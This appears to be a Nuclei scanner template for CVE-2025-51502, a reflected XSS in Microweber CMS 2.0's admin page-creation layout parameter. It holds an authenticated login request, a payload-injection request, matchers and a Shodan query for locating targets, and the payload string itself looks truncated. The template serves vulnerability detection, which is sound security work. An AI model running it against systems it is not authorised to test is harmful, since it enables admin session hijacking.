id: CVE-2025-51502 info: name: Microweber CMS 2.0 - Reflected XSS in Admin Page Creation author: nukunga severity: medium description: | Reflected Cross-Site Scripting (XSS) exists in Microweber CMS 2.0 through the layout parameter on the /admin/page/create page. It allows arbitrary JavaScript to execute in the context of authenticated admin users. impact: | Authenticated attackers can execute arbitrary JavaScript in victim browsers through the layout parameter in page creation, potentially enabling session hijacking and credential theft. remediation: | Upgrade Microweber CMS to a version later than 2.0 that properly sanitizes the layout parameter. reference: - https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51502 - https://nvd.nist.gov/vuln/detail/CVE-2025-51502 metadata: verified: true max-requests: 2 vendor: microweber product: microweber shodan-query: 'http.title:"Microweber"' tags: cve,cve2025,microweber,xss,authenticated,vuln variables: xss_payload: ">" flow: http(1) && http(2) http: - raw: - | POST /api/user_login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}}&lang=en_US&where_to=admin_content matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "success\":", "username\":")' condition: and internal: true - raw: - | GET /admin/page/create?layout="{{xss_payload}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, ">")' condition: and # digest: 490a0046304402201968c096f5bcbb080f1dbf4097b52912418193bbc1a84b3877824d069a13849602204e37c2c3fc257f72cd23a85bbc35e6d75b43166c4813af02be7d8e8e63c795c2:922c64590222798bb761d5b6d8e72950